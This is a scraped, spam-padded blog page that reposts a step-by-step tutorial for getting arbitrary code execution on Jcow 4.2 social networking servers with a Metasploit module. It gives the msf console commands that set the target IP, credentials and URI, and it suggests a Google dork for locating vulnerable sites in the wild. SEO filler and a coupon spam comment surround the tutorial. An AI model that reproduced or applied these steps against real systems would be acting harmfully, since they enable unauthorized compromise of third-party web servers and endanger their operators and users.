New Blog Techno News

Samsung Galaxy Note, 4G LTE Plans, Transfer Photos Videos from iPhone to Samsung, Network Performance, Mobile Accounts, Furious Gold SPD TooL, Latest Version Full Setup

Home » DNS Hacking » Learn Hacking » Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

By
Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution - this blog we have built from a few years ago and already very much information about gadgets that we convey and a lot of blog visitors New Blog Techno News who are satisfied with the information, we will always try to update the latest information for you, first about Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution many already we collect data to make this article so you do not miss the news, please see:

Articles : Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
full Link : Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
Article DNS Hacking, Article Learn Hacking,

You can also see our article on:


Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social networking engine can be exploited and the exploit ranking marked as "excellent".
So actually, what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example, if you hosting your Jcowvulnerable version(on insecure hosting also icon_smile ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually, it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext: Powered by Jcow 4.2.0" and register as the normal user there. In this tutorial I have already registered as username: victim and password also victim icon_smile
Okay, I hope you understand what I say above icon_razz to make it more realistic, let's try the tutorial…

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Level: Medium

Victim Server: work fine if victim uses Windows XP SP3
Victim vulnerable application: JCow 4.2
Attacker O.S: obviously you need Backtrack 5 R1

Requirement :

Here only you need bellow two item.
Which is your actual need.

1#. Metasploit framework

2.# Jcow.rb exploit mediafire.com

Now lets start this article.

Steps Hacking Jcow Social Networking Web Server via ArbitraryCode Execution Process:

1.#, first of all, you simply  Copy the 

downloaded cow.rb exploit from the 

download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(for example see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
now you see the text "framework" in blue color it's only because I'm using 

Backtrack 5 R1 and using Metasploit 

v4.0.1, so the name depended on 

your Metasploit version, maybe on your 

the computer can be "framework3" or 

"framework2" so on..so don't have

confused.

2.# now when you copy successfully 

after that, simply  Open your Metasploit 

console and then use the exploit you just added before see bellow 


msf > use exploit/remote/jcow


3.# now when you complete step 2, The 

next step we need to view the available 

switch for this exploit by running the show 

options command, and then configured it(see the text with red color).
jcow_bypass1
msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in/directory fill it here
uri => jcow
Importent:::?

Set URI can be used if cow was not 

installed on web server main directory

for example http://web-server.com/jcow.

4#. now your work has been almost  

done , After everything was set up 

successfully, the next thing to do was 

exploiting or running the exploit by using

  exploit command.












articles Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution finished in discussion
hopefully the information we convey about Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution can benefit you in getting new knowledge about technology,





you just finished reading the information Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution we hope this informmation can answer the question you submit to googlle, if you want to bookmark or share please use link https://moymoycikukecik.blogspot.com/2016/01/info-4-steps-hacking-jcow-social.html and do not forget to always visit this blog to get the latest information every day.


Tag : 
,
,







 Share on Facebook





Share on Twitter





Share on Google+




















Related : Info 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution




    














        1 komentar:
      









  1. Zenith Coupons24 Oktober 2019 pukul 22.36
    Great post. Its really amazing blog. I am learning so many new things. Thanks for sharing it with us. Please provide more blog posts on how to use and get discount by using Jockey Coupons 
    BalasHapus





























        

      







Langganan:
Posting Komentar (Atom)